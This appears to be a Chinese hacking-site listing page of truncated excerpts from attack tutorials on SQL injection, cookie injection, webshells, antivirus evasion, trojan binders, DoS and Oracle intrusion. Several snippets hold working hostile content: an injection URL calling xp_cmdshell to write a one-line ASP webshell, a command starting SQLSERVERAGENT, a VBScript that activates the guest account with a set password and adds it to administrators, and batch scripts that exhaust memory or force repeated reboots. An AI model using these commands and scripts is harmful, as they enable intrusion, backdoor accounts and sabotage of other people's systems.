简单的判断搜索型注入漏洞存在不存在的办法是先搜索'，如果出错，说明90%存在这个漏洞。然后搜索%，如果正常返回，说明95%有洞了。 然后再搜索一个关键字，比如2006吧，正常返回所有2006相关的信息，再搜索2006%'an ...……

从现实来看，市场上所大行其道的IDS产品价格从数十万到数百万不等，这种相对昂贵的奶酪被广为诟病，所导致的结果就是：一般中小企业并不具备实施IDS产品的能力，它们的精力会放在路由器、防火墙以及3层以上交换机的 ...……

以前说过的趋势挂马事件，MS这个挂马方法已经流行了很久，从去年就大规模开始了，在网上可以搜到很多痕迹。 SQL语句如下： 用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字 ...……

?php $now1 = `date`; echo Now date is: $now1; ? /* 利用PHP的反引号` (不明白的自己查资料反引号`的作用) 如果 $sec 变量未赋初值，可能导致 shell_exec 执行系统指令 */ ?php echo $sec; ...……

1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^script language=VBScript runat=server^execute request^(l^)^/script^ c:mu. ...……

我们先来说下基础知识，免的一些菜鸟看不懂,有借鉴. cookies欺骗，就是在只对用户做cookies验证的系统中，通过修改cookies的内容来得到相应的用户权限登录。 　　那么什么是cookies呢，我这里给大家一个 ...……

曾经饱受木马、后门(以下统称后门)侵害的人们都不会忘记机器被破坏后的惨象，于是人们展开了积极的防御工作，从补丁到防火墙，恨不得连网线都加个验证器，在多种多样的防御手法夹攻下，一大批后门倒下了，菜鸟们也不 ...……

我们知道，应用程序总是离不开系统内核所提供的服务，比如它要使用内存的时候，只要跟操作系统申请就行了，而不用自己操心哪里有空闲的内存空间等问题，实际上，这些问题是由操作系统的内核来代劳的。站在黑客的角度 ...……

入侵渗透涉及许多知识和技术，并不是一些人用一两招就可以搞定的。 一，踩点 踩点可以了解目标主机和网络的一些基本的安全信息，主要有； 1，管理员联系信息，电话号，传真号； 2，IP地址范围； ...……

我们在MYSQL注入的时候经常会碰到无法立即根据在注入点加单引号提交得到的返回信息来获得web目录,这个时候获得web路径就要费点劲了!针对这种情况,我介绍三种方法!load_file(char(47))查找部分*nix系统的目录。 a. ...……

首先，我们来讨论包含文件漏洞,首先要问的是,什么才是远程文件包含漏洞？回答是：服务器通过php的特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不严，从而可去包含一个恶意文件，而我们可以构造这个 ...……

'把网上的一个小程序改得方便了点，这个搜索次效率很好。 on error resume next Dim keyWord, DirTotal, TimeSpend, FileTotal, Fso, outFile, txtResult, txtPath, sPath Const MY_COMPUTER = &H11& Const ...……

手工修复引入表是破解加壳软件最难的一道工序，一向是顶尖高手的专利，令我等菜鸟往往望而却步，而不敢奢望越雷池半步！那么有没有简单一些的方法呢？通过本人的实践，终于找到了这条捷径。我的做法可以分为以下几步 ...……

１.安装完软件，打开后： ２.按照图中点选正确的设置，填写上你自己找到的代理IP地址，端口，或者帐号和密码： ３.（这一步看情况定：有的代理不要帐号密码）按照上图设置完后，点击“确定”完会弹出 ...……

我们知道在asp中出现得最多的还是sql注入，不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义，所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的 ...……

前些时间做一个渗透测试，数据库是informix的。整理了一下。 informix数据类型比较复杂，在union查询中最郁闷的就是匹配字段的问题 数据类型如下 informix的字段类型 char(size) varchar(size) seri ...……

DoS：我们所说的DoS (Denial of Service)攻击其中文含义是拒绝服务攻击，这种攻击行动使网站服务器充斥大量要求回复的信息，消耗网络带宽或系统资源，导致网络或系统不胜负荷以至于瘫痪而停止提供正常的网络服务。黑 ...……

来自草哲的blog 尝试在NB里面恢复CMDSHELL、OACREAT都没有成功，所以开启SQLSERVERAGENT ;exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';-- 　　还是没有成功，无 ...……

期中考试又快到了，笔者和其他同学一样，都处在一个紧张的复习状态里，简直要崩溃了。为了缓解学习上的压力，想在机房里安装几个黑软玩玩，可不巧的是做了很多限制，只能浏览一些简单的网页。另外对于从网上下载的普 ...……

木马免杀,在国内应该起源于05年吧.从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御.免杀技术越来越难.但是万变不离其宗--改特征码.到现在一些辅助软件的行为查杀. 以下讲解都是以远程控制软 ...……

最近有调查报告显示，知名品牌的杀毒软件对新型计算机病毒的查杀率只有20%，而漏杀率却高达80%。那么是什么原因造成这种状况的？到底是如今的病毒过于厉害，还是杀毒软件的能力有限？今天我们就通过实例来看看是什么 ...……

普通的黑客从进入到退出一次数据攻击只需用不到10秒钟时间就可完成，这个时间对于数据库管理员来说即使注意到入侵者都几乎不够。因此，在数据被损害很长时间之前，许多数据库攻击都没有被单位注意到。 　　令人奇 ...……

视频服务器都会提供大量的视频资源，大部分都提供了在线观看以及下载服务。对于流量要求比较高，而从服务器本身的部署来看，也有一些特别之处。我们从一个入侵实例来看看视频服务器中暴露出的弱点。 寻找漏洞 ...……

首先，根据版本的不同，TNS listener可能较易受到多种类型的缓冲区溢出攻击，这些攻击可以在不提供用户ID和口令的情况下被利用。例如：在oracle 9i中，当客户机请求某个过长的service_name时,很容易受到溢出攻击。当 ...……

站内搜索地址为： httpwww.google.comcustomdomains=（这里写我们要搜索的站点，比如feelids.com） 进去可以选择www和feelids.com， 当然再选我们要的站内搜索哦！ 黑客专用信息和资料搜索地址为： ht ...……

定义： DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理：如果可以冒充域名服务器，然后把查询的IP地址设为攻击者的IP地址，这样的话，用户上网就只能看到攻击者的主页，而不是用户想要取得的网站的主页了 ...……

现在很多网站都采用了通用防注入程序，那么对于这种网站，我门是否就束手无策了呢？答案是否定的，因为我们可以采用cookie 注入的方法，而很多通用防注入程序对这种注入方式都没有防备。 在讲之前,我们还是来回顾下 ...……

DDOS网络攻击是我们最常见的问题了，要防止DDOS网络攻击，首先就要了解其攻击的方式。 　　1.Synflood:该攻击以多个随机的源主机地址向目的主机发送SYN包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机 ...……

最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle 请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。 ...……

如何能够快速检测定位出局域网中的ARP病毒电脑？ 面对着局域网中成百台电脑，一个一个地检测显然不是好办法。其实我们只要利用ARP病毒的基本原理：发送伪造的ARP欺骗广播，中毒电脑自身伪装成网关的特性，就可 ...……

第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:1.txt echo. c:1.txt & goto err1 if not exist c:2.txt echo. ...……

具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。 具体的原理与分析过程我就不写了，写起来一大片，大家看的 ...……

樱木花盗's BLOG 今天看到有个关于搜索型注入的文章，用到的是一种新技术，探测的是三星：http://notebook.samsung.com.cn/index.aspx 注入方式是： 一般网站的搜索都是部分匹配的 有漏洞的url是h ...……

互联网的安全在今天越来越被更多的人重视。人们采用各种办法来保护网络安全。可总也避免不了这样那样的攻击、漏洞。下面例举了十种可瞬间毁掉整个互联网的袭击手段，让大家看看。也希望大家在日常上网或工作时能够注 ...……

1、webshell 这是“黑客”在web网站留下的网页后门程序，一般由一些网页程序编写，来执行一些特殊的功能。如PHP、ASP等。如它可以执行某些命令，如果web网站管理员对服务器权限设置出现漏洞。“黑客”可以通过它 ...……

Windows XP的使用过程中如果你是一个很容易遗忘的人，那么一定不要忘记在第一次设置密码的同时创建一张可以恢复Windows XP中的账户密码的启动盘，它可以让你免去格式化硬盘的烦恼。 　　从控制面板中找到用户账户 ...……

dim wsh set wsh=createobject(wscript.shell) wsh.run net user guest /active:yes,0 （激活guest账号） wsh.run net user guest hxhack,0 （修改guest密码为hxhack） wsh.run net localgroup administrato ...……

在获得SA密码后，往往因为服务器管理者或前人将net.exe和net1.exe被限制使用，无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象，用来管理本地资源，利用它可以不依靠CMD等命令就能添加一个管理 ...……

有时候拿到一SHELL是SA权限。 但是内网。我们直接想到用LCX转发端口 那假如LCX被杀了之后你会怎么办呢 当然很多人就会想到用远控。。。 因为我没玩过远控和其他的病毒 所以就想到了以下的办法 第一导 ...……

一、传统的捆绑器 　　这种原理很简单，也是目前用的最多的一种。就是将B.exe附加到A.exe的末尾。这样当A.exe被执行的时候，B.exe也跟着执行了。这种捆绑器的代码是满网都是。我最早是从jingtao的一篇关于流的文 ...……